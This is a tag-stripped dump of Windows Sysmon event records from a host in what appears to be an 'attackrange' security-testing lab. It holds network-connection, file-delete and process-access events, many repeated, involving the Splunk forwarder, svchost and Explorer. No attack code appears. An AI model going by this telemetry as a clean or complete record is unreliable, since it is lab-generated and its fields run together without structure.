Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56775-false10.0.1.12-8000- 23542300x800000000000000035085862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:16.623{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39D500CE41E4EAF033E776D361611270,SHA256=D1F5FED9C4215C57BC0C53B6D682C1CFA38F608ACC0092BE0D5E427F371CB4A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:17.653{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9298BD87252056296BBC8D193F3477A0,SHA256=388B29350A8908F3BC990C9C13110445B9C0B244F353D8107C6476E241556D82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:18.673{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EB2C5BF7645B7F7A2C64175D17BBAC7,SHA256=2DF5855B8142C894B25EE78B0F61642E50CD9DC0DD45F77690094B15726D6682,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.869{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D01A2D9FC9B0049B50F5A5C7D28064F0,SHA256=6FEF26304C411DEB0572E20259A898D735235C87E8F45AB2FE300A905B2BC39F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.237{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D7F5B679520EF29CC85D26115BD0ABB1,SHA256=2AD89D6B83F61FACA7AB486466DC553D3A251DDDF3D6802EF3581DD269E23381,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 